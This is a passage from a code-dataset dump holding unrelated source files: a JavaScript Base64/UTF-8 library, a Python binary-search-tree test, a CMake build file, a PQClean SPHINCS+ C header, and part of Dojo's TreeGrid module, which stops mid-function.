text
stringlengths 2
100k
| meta
dict |
---|---|
/* /_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
charset = shift_jis
+++ Base64 Encode / Decode +++
LastModified : 2006-11/08
Powered by kerry
http://202.248.69.143/~goma/
動作ブラウザ :: IE4+ , NN4.06+ , Gecko , Opera6+
* [RFC 2045] Multipurpose Internet Mail Extensions
(MIME) Part One:
Format of Internet Message Bodies
ftp://ftp.isi.edu/in-notes/rfc2045.txt
/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
* Usage:
// エンコード
b64_string = base64.encode( my_data [, strMode] );
// デコード
my_data = base64.decode( b64_string [, strMode] );
strMode -> 入力データが文字列の場合 1 を
/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ */
base64 = new function()
{
var utfLibName = "utf";
var b64char = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var b64encTable = b64char.split("");
var b64decTable = [];
for (var i=0; i<b64char.length; i++) b64decTable[b64char.charAt(i)] = i;
this.encode = function(_dat, _strMode)
{
return encoder( _strMode? unpackUTF8(_dat): unpackChar(_dat) );
}
var encoder = function(_ary)
{
var md = _ary.length % 3;
var b64 = "";
var i, tmp = 0;
if (md) for (i=3-md; i>0; i--) _ary[_ary.length] = 0;
for (i=0; i<_ary.length; i+=3)
{
tmp = (_ary[i]<<16) | (_ary[i+1]<<8) | _ary[i+2];
b64 += b64encTable[ (tmp >>>18) & 0x3f]
+ b64encTable[ (tmp >>>12) & 0x3f]
+ b64encTable[ (tmp >>> 6) & 0x3f]
+ b64encTable[ tmp & 0x3f];
}
if (md) // 3の倍数にパディングした 0x0 分 = に置き換え
{
md = 3- md;
b64 = b64.substr(0, b64.length- md);
while (md--) b64 += "=";
}
return b64;
}
this.decode = function(_b64, _strMode)
{
var tmp = decoder( _b64 );
return _strMode? packUTF8(tmp): packChar(tmp);
}
var decoder = function(_b64)
{
_b64 = _b64.replace(/[^A-Za-z0-9\+\/]/g, "");
var md = _b64.length % 4;
var j, i, tmp;
var dat = [];
// replace 時 = も削っている。その = の代わりに 0x0 を補間
if (md) for (i=0; i<4-md; i++) _b64 += "A";
for (j=i=0; i<_b64.length; i+=4, j+=3)
{
tmp = (b64decTable[_b64.charAt( i )] <<18)
| (b64decTable[_b64.charAt(i+1)] <<12)
| (b64decTable[_b64.charAt(i+2)] << 6)
| b64decTable[_b64.charAt(i+3)];
dat[ j ] = tmp >>> 16;
dat[j+1] = (tmp >>> 8) & 0xff;
dat[j+2] = tmp & 0xff;
}
// 補完された 0x0 分削る
if (md) dat.length -= [0,0,2,1][md];
return dat;
}
var packUTF8 = function(_x){ return window[utfLibName].packUTF8(_x) };
var unpackUTF8 = function(_x){ return window[utfLibName].unpackUTF8(_x) };
var packChar = function(_x){ return window[utfLibName].packChar(_x) };
var unpackChar = function(_x){ return window[utfLibName].unpackChar(_x) };
}
/* /_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
charset = shift_jis
+++ UTF8/16 ライブラリ +++
LastModified : 2006-10/16
Powered by kerry
http://202.248.69.143/~goma/
動作ブラウザ :: IE4+ , NN4.06+ , Gecko , Opera6+
* [RFC 2279] UTF-8, a transformation format of ISO 10646
ftp://ftp.isi.edu/in-notes/rfc2279.txt
* [RFC 1738] Uniform Resource Locators (URL)
ftp://ftp.isi.edu/in-notes/rfc1738.txt
/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
Usage:
// 文字列を UTF16 (文字コード) へ
utf16code_array = utf.unpackUTF16( my_string );
// 文字列を UTF8 (文字コード) へ
utf8code_array = utf.unpackUTF8( my_string );
// UTF8 (文字コード) から文字列へ。 utf.unpackUTF8() したものを元に戻す
my_string = utf.packUTF8( utf8code_array );
// UTF8/16 (文字コード) を文字列へ
my_string = utf.packChar( utfCode_array );
// UTF16 (文字コード) から UTF8 (文字コード) へ
utf8code_array = utf.toUTF8( utf16code_array );
// UTF8 (文字コード) から UTF16 (文字コード) へ
utf16code_array = utf.toUTF16( utf8code_array );
// URL 文字列へエンコード
url_string = utf.URLencode( my_string );
// URL 文字列からデコード
my_string = utf.URLdecode( url_string );
/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ */
utf = new function()
{
this.unpackUTF16 = function(_str)
{
var i, utf16=[];
for (i=0; i<_str.length; i++) utf16[i] = _str.charCodeAt(i);
return utf16;
}
this.unpackChar = function(_str)
{
var utf16 = this.unpackUTF16(_str);
var i,n, tmp = [];
for (n=i=0; i<utf16.length; i++) {
if (utf16[i]<=0xff) tmp[n++] = utf16[i];
else {
tmp[n++] = utf16[i] >> 8;
tmp[n++] = utf16[i] & 0xff;
}
}
return tmp;
}
this.packChar =
this.packUTF16 = function(_utf16)
{
var i, str = "";
for (i in _utf16) str += String.fromCharCode(_utf16[i]);
return str;
}
this.unpackUTF8 = function(_str)
{
return this.toUTF8( this.unpackUTF16(_str) );
}
this.packUTF8 = function(_utf8)
{
return this.packUTF16( this.toUTF16(_utf8) );
}
this.toUTF8 = function(_utf16)
{
var utf8 = [];
var idx = 0;
var i, j, c;
for (i=0; i<_utf16.length; i++)
{
c = _utf16[i];
if (c <= 0x7f) utf8[idx++] = c;
else if (c <= 0x7ff)
{
utf8[idx++] = 0xc0 | (c >>> 6 );
utf8[idx++] = 0x80 | (c & 0x3f);
}
else if (c <= 0xffff)
{
utf8[idx++] = 0xe0 | (c >>> 12 );
utf8[idx++] = 0x80 | ((c >>> 6 ) & 0x3f);
utf8[idx++] = 0x80 | (c & 0x3f);
}
else
{
j = 4;
while (c >> (6*j)) j++;
utf8[idx++] = ((0xff00 >>> j) & 0xff) | (c >>> (6*--j) );
while (j--)
utf8[idx++] = 0x80 | ((c >>> (6*j)) & 0x3f);
}
}
return utf8;
}
this.toUTF16 = function(_utf8)
{
var utf16 = [];
var idx = 0;
var i,s;
for (i=0; i<_utf8.length; i++, idx++)
{
if (_utf8[i] <= 0x7f) utf16[idx] = _utf8[i];
else
{
if ( (_utf8[i]>>5) == 0x6)
{
utf16[idx] = ( (_utf8[i] & 0x1f) << 6 )
| ( _utf8[++i] & 0x3f );
}
else if ( (_utf8[i]>>4) == 0xe)
{
utf16[idx] = ( (_utf8[i] & 0xf) << 12 )
| ( (_utf8[++i] & 0x3f) << 6 )
| ( _utf8[++i] & 0x3f );
}
else
{
s = 1;
while (_utf8[i] & (0x20 >>> s) ) s++;
utf16[idx] = _utf8[i] & (0x1f >>> s);
while (s-->=0) utf16[idx] = (utf16[idx] << 6) ^ (_utf8[++i] & 0x3f);
}
}
}
return utf16;
}
this.URLencode = function(_str)
{
return _str.replace(/([^a-zA-Z0-9_\-\.])/g, function(_tmp, _c)
{
if (_c == "\x20") return "+";
var tmp = utf.toUTF8( [_c.charCodeAt(0)] );
var c = "";
for (var i in tmp)
{
i = tmp[i].toString(16);
if (i.length == 1) i = "0"+ i;
c += "%"+ i;
}
return c;
} );
}
this.URLdecode = function(_dat)
{
_dat = _dat.replace(/\+/g, "\x20");
_dat = _dat.replace( /%([a-fA-F0-9][a-fA-F0-9])/g,
function(_tmp, _hex){ return String.fromCharCode( parseInt(_hex, 16) ) } );
return this.packChar( this.toUTF16( this.unpackUTF16(_dat) ) );
}
}
| {
"pile_set_name": "Github"
} |
from binary_tree_prototype import BinaryTreeNode
# @include
def pair_includes_ancestor_and_descendant_of_m(possible_anc_or_desc_0,
possible_anc_or_desc_1, middle):
search_0, search_1 = possible_anc_or_desc_0, possible_anc_or_desc_1
# Perform interleaved searching from possible_anc_or_desc_0 and
# possible_anc_or_desc_1 for middle.
while (search_0 is not possible_anc_or_desc_1 and search_0 is not middle and
search_1 is not possible_anc_or_desc_0 and search_1 is not middle and
(search_0 or search_1)):
if search_0:
search_0 = (search_0.left if search_0.data >
middle.data else search_0.right)
if search_1:
search_1 = (search_1.left if search_1.data >
middle.data else search_1.right)
# If both searches were unsuccessful, or we got from
# possible_anc_or_desc_0 to possible_anc_or_desc_1 without seeing middle,
# or from possible_anc_or_desc_1 to possible_anc_or_desc_0 without seeing
# middle, middle cannot lie between possible_anc_or_desc_0 and
# possible_anc_or_desc_1.
if ((search_0 is not middle and search_1 is not middle) or
search_0 is possible_anc_or_desc_1 or
search_1 is possible_anc_or_desc_0):
return False
def search_target(source, target):
while source and source is not target:
source = source.left if source.data > target.data else source.right
return source is target
# If we get here, we already know one of possible_anc_or_desc_0 or
# possible_anc_or_desc_1 has a path to middle. Check if middle has a path
# to possible_anc_or_desc_1 or to possible_anc_or_desc_0.
return search_target(
middle,
possible_anc_or_desc_1 if search_0 is middle else possible_anc_or_desc_0)
# @exclude
def small_test():
root = BinaryTreeNode(5)
assert not pair_includes_ancestor_and_descendant_of_m(root, root, root)
root.left = BinaryTreeNode(2)
root.left.right = BinaryTreeNode(4)
assert not pair_includes_ancestor_and_descendant_of_m(root, root.left,
root.left.right)
assert pair_includes_ancestor_and_descendant_of_m(root, root.left.right,
root.left)
# Example of the first figure of BST chapter.
root = BinaryTreeNode(19)
root.left = BinaryTreeNode(7)
root.left.left = BinaryTreeNode(3)
root.left.left.left = BinaryTreeNode(2)
root.left.left.right = BinaryTreeNode(5)
root.left.right = BinaryTreeNode(11)
root.left.right.right = BinaryTreeNode(17)
root.left.right.right.left = BinaryTreeNode(13)
root.right = BinaryTreeNode(43)
root.right.left = BinaryTreeNode(23)
root.right.left.right = BinaryTreeNode(37)
root.right.left.right.left = BinaryTreeNode(29)
root.right.left.right.left.right = BinaryTreeNode(31)
root.right.left.right.right = BinaryTreeNode(41)
root.right.right = BinaryTreeNode(47)
root.right.right.right = BinaryTreeNode(53)
assert not pair_includes_ancestor_and_descendant_of_m(root.right, root.left,
root.right.left)
assert pair_includes_ancestor_and_descendant_of_m(
root, root.right.left.right.left.right, root.right.left)
def main():
small_test()
# 3
# 2 5
# 1 4 6
root = BinaryTreeNode(3)
root.left = BinaryTreeNode(2)
root.left.left = BinaryTreeNode(1)
root.right = BinaryTreeNode(5)
root.right.left = BinaryTreeNode(4)
root.right.right = BinaryTreeNode(6)
assert pair_includes_ancestor_and_descendant_of_m(root, root.right.right,
root.right)
assert pair_includes_ancestor_and_descendant_of_m(root.right.right, root,
root.right)
assert not pair_includes_ancestor_and_descendant_of_m(root, root.right,
root.right.right)
assert not pair_includes_ancestor_and_descendant_of_m(root.right, root,
root.right.right)
assert (not pair_includes_ancestor_and_descendant_of_m(
root.right.left, root.right.right, root.right))
assert (not pair_includes_ancestor_and_descendant_of_m(
root.right.left, root.left.left, root.right))
if __name__ == '__main__':
main()
| {
"pile_set_name": "Github"
} |
add_definitions(-DUSE_WINE_TODOS)
add_executable(qedit_winetest mediadet.c timeline.c testlist.c qedit.rc)
set_module_type(qedit_winetest win32cui)
add_importlibs(qedit_winetest oleaut32 ole32 msvcrt kernel32)
add_rostests_file(TARGET qedit_winetest)
| {
"pile_set_name": "Github"
} |
#ifndef PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_ADDRESS_H
#define PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_ADDRESS_H
#include <stdint.h>
#define PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_ADDR_TYPE_WOTS 0
#define PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_ADDR_TYPE_WOTSPK 1
#define PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_ADDR_TYPE_HASHTREE 2
#define PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_ADDR_TYPE_FORSTREE 3
#define PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_ADDR_TYPE_FORSPK 4
void PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_addr_to_bytes(
unsigned char *bytes, const uint32_t addr[8]);
void PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_set_layer_addr(
uint32_t addr[8], uint32_t layer);
void PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_set_tree_addr(
uint32_t addr[8], uint64_t tree);
void PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_set_type(
uint32_t addr[8], uint32_t type);
/* Copies the layer and tree part of one address into the other */
void PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_copy_subtree_addr(
uint32_t out[8], const uint32_t in[8]);
/* These functions are used for WOTS and FORS addresses. */
void PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_set_keypair_addr(
uint32_t addr[8], uint32_t keypair);
void PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_set_chain_addr(
uint32_t addr[8], uint32_t chain);
void PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_set_hash_addr(
uint32_t addr[8], uint32_t hash);
void PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_copy_keypair_addr(
uint32_t out[8], const uint32_t in[8]);
/* These functions are used for all hash tree addresses (including FORS). */
void PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_set_tree_height(
uint32_t addr[8], uint32_t tree_height);
void PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_set_tree_index(
uint32_t addr[8], uint32_t tree_index);
#endif
| {
"pile_set_name": "Github"
} |
define([
"dojo/_base/kernel",
"../main",
"dojo/_base/declare",
"dojo/_base/array",
"dojo/_base/lang",
"dojo/_base/event",
"dojo/dom-attr",
"dojo/dom-class",
"dojo/query",
"dojo/keys",
"dijit/tree/ForestStoreModel",
"./DataGrid",
"./_Layout",
"./_FocusManager",
"./_RowManager",
"./_EditManager",
"./TreeSelection",
"./cells/tree",
"./_TreeView"
], function(dojo, dojox, declare, array, lang, event, domAttr, domClass, query, keys, ForestStoreModel,
DataGrid, _Layout, _FocusManager, _RowManager, _EditManager, TreeSelection, TreeCell){
dojo.experimental("dojox.grid.TreeGrid");
var _TreeAggregator = declare("dojox.grid._TreeAggregator", null, {
cells: [],
grid: null,
childFields: [],
constructor: function(kwArgs){
this.cells = kwArgs.cells || [];
this.childFields = kwArgs.childFields || [];
this.grid = kwArgs.grid;
this.store = this.grid.store;
},
_cacheValue: function(cache, id, value){
cache[id] = value;
return value;
},
clearSubtotalCache: function(){
// summary:
// Clears the subtotal cache so that we are forced to recalc it
// (or reread it) again. This is needed, for example, when
// column order is changed.
if(this.store){
delete this.store._cachedAggregates;
}
},
cnt: function(cell, level, item){
// summary:
// calculates the count of the children of item at the given level
var total = 0;
var store = this.store;
var childFields = this.childFields;
if(childFields[level]){
var children = store.getValues(item, childFields[level]);
if (cell.index <= level + 1){
total = children.length;
}else{
array.forEach(children, function(c){
total += this.getForCell(cell, level + 1, c, "cnt");
}, this);
}
}else{
total = 1;
}
return total;
},
sum: function(cell, level, item){
// summary:
// calculates the sum of the children of item at the given level
var total = 0;
var store = this.store;
var childFields = this.childFields;
if(childFields[level]){
array.forEach(store.getValues(item, childFields[level]), function(c){
total += this.getForCell(cell, level + 1, c, "sum");
}, this);
}else{
total += store.getValue(item, cell.field);
}
return total;
},
value: function(cell, level, item){
// summary:
// Empty function so that we can set "aggregate='value'" to
// force loading from the data - and bypass calculating
},
getForCell: function(cell, level, item, type){
// summary:
// Gets the value of the given cell at the given level and type.
// type can be one of "sum", "cnt", or "value". If itemAggregates
// is set and can be used, it is used instead. Values are also
// cached to prevent calculating them too often.
var store = this.store;
if(!store || !item || !store.isItem(item)){ return ""; }
var storeCache = store._cachedAggregates = store._cachedAggregates || {};
var id = store.getIdentity(item);
var itemCache = storeCache[id] = storeCache[id] || [];
if(!cell.getOpenState){
cell = this.grid.getCell(cell.layoutIndex + level + 1);
}
var idx = cell.index;
var idxCache = itemCache[idx] = itemCache[idx] || {};
type = (type || (cell.parentCell ? cell.parentCell.aggregate : "sum"))||"sum";
var attr = cell.field;
if(attr == store.getLabelAttributes()[0]){
// If our attribute is one of the label attributes, we should
// use cnt instead (since it makes no sense to do a sum of labels)
type = "cnt";
}
var typeCache = idxCache[type] = idxCache[type] || [];
// See if we have it in our cache immediately for easy returning
if(typeCache[level] != undefined){
return typeCache[level];
}
// See if they have specified a valid field
var field = ((cell.parentCell && cell.parentCell.itemAggregates) ?
cell.parentCell.itemAggregates[cell.idxInParent] : "")||"";
if(field && store.hasAttribute(item, field)){
return this._cacheValue(typeCache, level, store.getValue(item, field));
}else if(field){
return this._cacheValue(typeCache, level, 0);
}
// Calculate it
return this._cacheValue(typeCache, level, this[type](cell, level, item));
}
});
var _TreeLayout = declare("dojox.grid._TreeLayout", _Layout, {
// Whether or not we are collapsable - this is calculated when we
// set our structure.
_isCollapsable: false,
_getInternalStructure: function(inStructure){
// Create a "Tree View" with 1 row containing references for
// each column (recursively)
var g = this.grid;
var s = inStructure;
var cells = s[0].cells[0];
var tree = {
type: "dojox.grid._TreeView",
cells: [[]]
};
var cFields = [];
var maxLevels = 0;
var getTreeCells = function(parentCell, level){
var children = parentCell.children;
var cloneTreeCell = function(originalCell, idx){
var k, n = {};
for(k in originalCell){
n[k] = originalCell[k];
}
n = lang.mixin(n, {
level: level,
idxInParent: level > 0 ? idx : -1,
parentCell: level > 0 ? parentCell : null
});
return n;
};
var ret = [];
array.forEach(children, function(c, idx){
if("children" in c){
cFields.push(c.field);
var last = ret[ret.length - 1];
last.isCollapsable = true;
c.level = level;
ret = ret.concat(getTreeCells(c, level + 1));
}else{
ret.push(cloneTreeCell(c, idx));
}
});
maxLevels = Math.max(maxLevels, level);
return ret;
};
var tCell = {children: cells, itemAggregates: []};
tree.cells[0] = getTreeCells(tCell, 0);
g.aggregator = new _TreeAggregator({cells: tree.cells[0],
grid: g,
childFields: cFields});
if(g.scroller && g.defaultOpen){
g.scroller.defaultRowHeight = g.scroller._origDefaultRowHeight * (2 * maxLevels + 1);
}
return [ tree ];
},
setStructure: function(inStructure){
// Mangle the structure a bit and make it work as desired
var s = inStructure;
var g = this.grid;
// Only supporting single-view, single row or else we
// are not collapsable
if(g && g.treeModel && !array.every(s, function(i){
return ("cells" in i);
})){
s = arguments[0] = [{cells:[s]}];
}
if(s.length == 1 && s[0].cells.length == 1){
if(g && g.treeModel){
s[0].type = "dojox.grid._TreeView";
this._isCollapsable = true;
s[0].cells[0][(this.grid.treeModel?this.grid.expandoCell:0)].isCollapsable = true;
}else{
var childCells = array.filter(s[0].cells[0], function(c){
return ("children" in c);
});
if(childCells.length === 1){
this._isCollapsable = true;
}
}
}
if(this._isCollapsable && (!g || !g.treeModel)){
arguments[0] = this._getInternalStructure(s);
}
this.inherited(arguments);
},
addCellDef: function(inRowIndex, inCellIndex, inDef){
var obj = this.inherited(arguments);
return lang.mixin(obj, TreeCell);
}
});
var TreePath = declare("dojox.grid.TreePath", null, {
level: 0,
_str: "",
_arr: null,
grid: null,
store: null,
cell: null,
constructor: function(/*String|Integer[]|Integer|dojox.grid.TreePath*/ path, /*dojox.grid.TreeGrid*/ grid){
if(lang.isString(path)){
this._str = path;
this._arr = array.map(path.split('/'), function(item){ return parseInt(item, 10); });
}else if(lang.isArray(path)){
this._str = path.join('/');
this._arr = path.slice(0);
}else if(typeof path == "number"){
this._str = String(path);
this._arr = [path];
}else{
this._str = path._str;
this._arr = path._arr.slice(0);
}
this.level = this._arr.length-1;
this.grid = grid;
this.store = this.grid.store;
if(grid.treeModel){
this.cell = grid.layout.cells[grid.expandoCell];
}else{
this.cell = grid.layout.cells[this.level];
}
},
item: function(){
// summary:
// gets the dojo.data item associated with this path
if(!this._item){
this._item = this.grid.getItem(this._arr);
}
return this._item;
},
compare: function(path /*dojox.grid.TreePath|String|Array*/){
// summary:
// compares two paths
if(lang.isString(path) || lang.isArray(path)){
if(this._str == path){ return 0; }
if(path.join && this._str == path.join('/')){ return 0; }
path = new TreePath(path, this.grid);
}else if(path instanceof TreePath){
if(this._str == path._str){ return 0; }
}
for(var i=0, l=(this._arr.length < path._arr.length ? this._arr.length : path._arr.length); i<l; i++){
if(this._arr[i]<path._arr[i]){ return -1; }
if(this._arr[i]>path._arr[i]){ return 1; }
}
if(this._arr.length<path._arr.length){ return -1; }
if(this._arr.length>path._arr.length){ return 1; }
return 0;
},
isOpen: function(){
// summary:
// Returns the open state of this cell.
return this.cell.openStates && this.cell.getOpenState(this.item());
},
previous: function(){
// summary:
// Returns the path that is before this path in the
// grid. If no path is found, returns null.
var new_path = this._arr.slice(0);
if(this._str == "0"){
return null;
}
var last = new_path.length-1;
if(new_path[last] === 0){
new_path.pop();
return new TreePath(new_path, this.grid);
}
new_path[last]--;
var path = new TreePath(new_path, this.grid);
return path.lastChild(true);
},
next: function(){
// summary:
// Returns the next path in the grid. If no path
// is found, returns null.
var new_path = this._arr.slice(0);
if(this.isOpen()){
new_path.push(0);
}else{
new_path[new_path.length-1]++;
for(var i=this.level; i>=0; i--){
var item = this.grid.getItem(new_path.slice(0, i+1));
if(i>0){
if(!item){
new_path.pop();
new_path[i-1]++;
}
}else{
if(!item){
return null;
}
}
}
}
return new TreePath(new_path, this.grid);
},
children: function(alwaysReturn){
// summary:
// Returns the child data items of this row. If this
// row isn't open and alwaysReturn is falsey, returns null.
if(!this.isOpen()&&!alwaysReturn){
return null;
}
var items = [];
var model = this.grid.treeModel;
if(model){
var item = this.item();
var store = model.store;
if(!model.mayHaveChildren(item)){
return null;
}
array.forEach(model.childrenAttrs, function(attr){
items = items.concat(store.getValues(item, attr));
});
}else{
items = this.store.getValues(this.item(), this.grid.layout.cells[this.cell.level+1].parentCell.field);
if(items.length>1&&this.grid.sortChildItems){
var sortProps = this.grid.getSortProps();
if(sortProps&&sortProps.length){
var attr = sortProps[0].attribute,
grid = this.grid;
if(attr&&items[0][attr]){
var desc = !!sortProps[0].descending;
items = items.slice(0); // don't touch the array in the store, make a copy
items.sort(function(a, b){
return grid._childItemSorter(a, b, attr, desc);
});
}
}
}
}
return items;
},
childPaths: function(){
var childItems = this.children();
if(!childItems){
return [];
}
return array.map(childItems, function(item, index){
return new TreePath(this._str + '/' + index, this.grid);
}, this);
},
parent: function(){
// summary:
// Returns the parent path of this path. If this is a
// top-level row, returns null.
if(this.level === 0){
return null;
}
return new TreePath(this._arr.slice(0, this.level), this.grid);
},
lastChild: function(/*Boolean?*/ traverse){
// summary:
// Returns the last child row below this path. If traverse
// is true, will traverse down to find the last child row
// of this branch. If there are no children, returns itself.
var children = this.children();
if(!children || !children.length){
return this;
}
var path = new TreePath(this._str + "/" + String(children.length-1), this.grid);
if(!traverse){
return path;
}
return path.lastChild(true);
},
toString: function(){
return this._str;
}
});
var _TreeFocusManager = declare("dojox.grid._TreeFocusManager", _FocusManager, {
setFocusCell: function(inCell, inRowIndex){
if(inCell && inCell.getNode(inRowIndex)){
this.inherited(arguments);
}
},
isLastFocusCell: function(){
if(this.cell && this.cell.index == this.grid.layout.cellCount-1){
var path = new TreePath(this.grid.rowCount-1, this.grid);
path = path.lastChild(true);
return this.rowIndex == path._str;
}
return false;
},
next: function(){
// summary:
// focus next grid cell
if(this.cell){
var row=this.rowIndex, col=this.cell.index+1, cc=this.grid.layout.cellCount-1;
var path = new TreePath(this.rowIndex, this.grid);
if(col > cc){
var new_path = path.next();
if(!new_path){
col--;
}else{
col = 0;
path = new_path;
}
}
if(this.grid.edit.isEditing()){ //when editing, only navigate to editable cells
var nextCell = this.grid.getCell(col);
if (!this.isLastFocusCell() && !nextCell.editable){
this._focusifyCellNode(false);
this.cell=nextCell;
this.rowIndex=path._str;
this.next();
return;
}
}
this.setFocusIndex(path._str, col);
}
},
previous: function(){
// summary:
// focus previous grid cell
if(this.cell){
var row=(this.rowIndex || 0), col=(this.cell.index || 0) - 1;
var path = new TreePath(row, this.grid);
if(col < 0){
var new_path = path.previous();
if(!new_path){
col = 0;
}else{
col = this.grid.layout.cellCount-1;
path = new_path;
}
}
if(this.grid.edit.isEditing()){ //when editing, only navigate to editable cells
var prevCell = this.grid.getCell(col);
if (!this.isFirstFocusCell() && !prevCell.editable){
this._focusifyCellNode(false);
this.cell=prevCell;
this.rowIndex=path._str;
this.previous();
return;
}
}
this.setFocusIndex(path._str, col);
}
},
move: function(inRowDelta, inColDelta){
if(this.isNavHeader()){
this.inherited(arguments);
return;
}
if(!this.cell){ return; }
// Handle grid proper.
var sc = this.grid.scroller,
r = this.rowIndex,
rc = this.grid.rowCount-1,
path = new TreePath(this.rowIndex, this.grid);
if(inRowDelta){
var row;
if(inRowDelta>0){
path = path.next();
row = path._arr[0];
if(row > sc.getLastPageRow(sc.page)){
//need to load additional data, let scroller do that
this.grid.setScrollTop(this.grid.scrollTop+sc.findScrollTop(row)-sc.findScrollTop(r));
}
}else if(inRowDelta<0){
path = path.previous();
row = path._arr[0];
if(row <= sc.getPageRow(sc.page)){
//need to load additional data, let scroller do that
this.grid.setScrollTop(this.grid.scrollTop-sc.findScrollTop(r)-sc.findScrollTop(row));
}
}
}
var cc = this.grid.layout.cellCount-1,
i = this.cell.index,
col = Math.min(cc, Math.max(0, i+inColDelta));
var cell = this.grid.getCell(col);
var colDir = inColDelta < 0 ? -1 : 1;
while(col>=0 && col < cc && cell && cell.hidden === true){
// skip hidden cells
col += colDir;
cell = this.grid.getCell(col);
}
if (!cell || cell.hidden === true){
// don't change col if would move to hidden
col = i;
}
if(inRowDelta){
this.grid.updateRow(r);
}
this.setFocusIndex(path._str, col);
}
});
var TreeGrid = declare("dojox.grid.TreeGrid", DataGrid, {
// summary:
// A grid that supports nesting rows - it provides an expando function
// similar to dijit.Tree. It also provides mechanisms for aggregating
// the values of subrows
// description:
// TreeGrid currently only works on "simple" structures. That is,
// single-view structures with a single row in them.
//
// The TreeGrid works using the concept of "levels" - level 0 are the
// top-level items.
// defaultOpen: Boolean
// Whether or not we default to open (all levels). This defaults to
// false for grids with a treeModel.
defaultOpen: true,
// sortChildItems: Boolean
// If true, child items will be returned sorted according to the sorting
// properties of the grid.
sortChildItems: false,
// openAtLevels: Array
// Which levels we are open at (overrides defaultOpen for the values
// that exist here). Its values can be a boolean (true/false) or an
// integer (for the # of children to be closed if there are more than
// that)
openAtLevels: [],
// treeModel: dijit.tree.ForestStoreModel
// A dijit.Tree model that will be used instead of using aggregates.
// Setting this value will make the TreeGrid behave like a columnar
// tree. When setting this value, defaultOpen will default to false,
// and openAtLevels will be ignored.
treeModel: null,
// expandoCell: Integer
// When used in conjunction with a treeModel (see above), this is a 0-based
// index of the cell in which to place the actual expando
expandoCell: 0,
// aggregator: Object
// The aggregator class - it will be populated automatically if we
// are a collapsible grid
aggregator: null,
// Override this to get our "magic" layout
_layoutClass: _TreeLayout,
createSelection: function(){
this.selection = new TreeSelection(this);
},
_childItemSorter: function(a, b, attribute, descending){
var av = this.store.getValue(a, attribute);
var bv = this.store.getValue(b, attribute);
if(av != bv){
return av < bv == descending ? 1 : -1;
}
return 0;
},
_onNew: function(item, parentInfo){
if(!parentInfo || !parentInfo.item){
this.inherited(arguments);
}else{
var idx = this.getItemIndex(parentInfo.item);
if(typeof idx == "string"){
this.updateRow(idx.split('/')[0]);
}else if(idx > -1){
this.updateRow(idx);
}
}
},
_onSet: function(item, attribute, oldValue, newValue){
this._checkUpdateStatus();
if(this.aggregator){
this.aggregator.clearSubtotalCache();
}
var idx = this.getItemIndex(item);
if(typeof idx == "string"){
this.updateRow(idx.split('/')[0]);
}else if(idx > -1){
this.updateRow(idx);
}
},
_onDelete: function(item){
this._cleanupExpandoCache(this._getItemIndex(item, true), this.store.getIdentity(item), item);
this.inherited(arguments);
},
_clearData: function() {
this.inherited(arguments);
this._by_idty_paths = {};
},
_cleanupExpandoCache: function(index, identity, item){},
_addItem: function(item, index, noUpdate, dontUpdateRoot){
// add our root items to the root of the model's children
// list since we don't query the model
if(!dontUpdateRoot && this.model && array.indexOf(this.model.root.children, item) == -1){
this.model.root.children[index] = item;
}
this.inherited(arguments);
},
getItem: function(/*integer|Array|String*/ idx){
// summary:
// overridden so that you can pass in a '/' delimited string of indexes to get the
// item based off its path...that is, passing in "1/3/2" will get the
// 3rd (0-based) child from the 4th child of the 2nd top-level item.
var isArray = lang.isArray(idx);
if(lang.isString(idx) && idx.indexOf('/')){
idx = idx.split('/');
isArray = true;
}
if(isArray && idx.length == 1){
idx = idx[0];
isArray = false;
}
if(!isArray){
return DataGrid.prototype.getItem.call(this, idx);
}
var s = this.store;
var itm = DataGrid.prototype.getItem.call(this, idx[0]);
var cf, i, j;
if(this.aggregator){
cf = this.aggregator.childFields||[];
if(cf){
for(i = 0; i < idx.length - 1 && itm; i++){
if(cf[i]){
itm = (s.getValues(itm, cf[i])||[])[idx[i + 1]];
}else{
itm = null;
}
}
}
}else if(this.treeModel){
cf = this.treeModel.childrenAttrs||[];
if(cf&&itm){
for(i=1, il=idx.length; (i<il) && itm; i++) {
for(j=0, jl=cf.length; j<jl; j++) {
if(cf[j]){
itm = (s.getValues(itm, cf[j])||[])[idx[i]];
}else{
itm = null;
}
if(itm){ break; }
}
}
}
}
return itm || null;
},
_getItemIndex: function(item, isDeleted){
if(!isDeleted && !this.store.isItem(item)){
return -1;
}
var idx = this.inherited(arguments);
if(idx == -1){
var idty = this.store.getIdentity(item);
return this._by_idty_paths[idty] || -1;
}
return idx;
},
postMixInProperties: function(){
if(this.treeModel && !("defaultOpen" in this.params)){
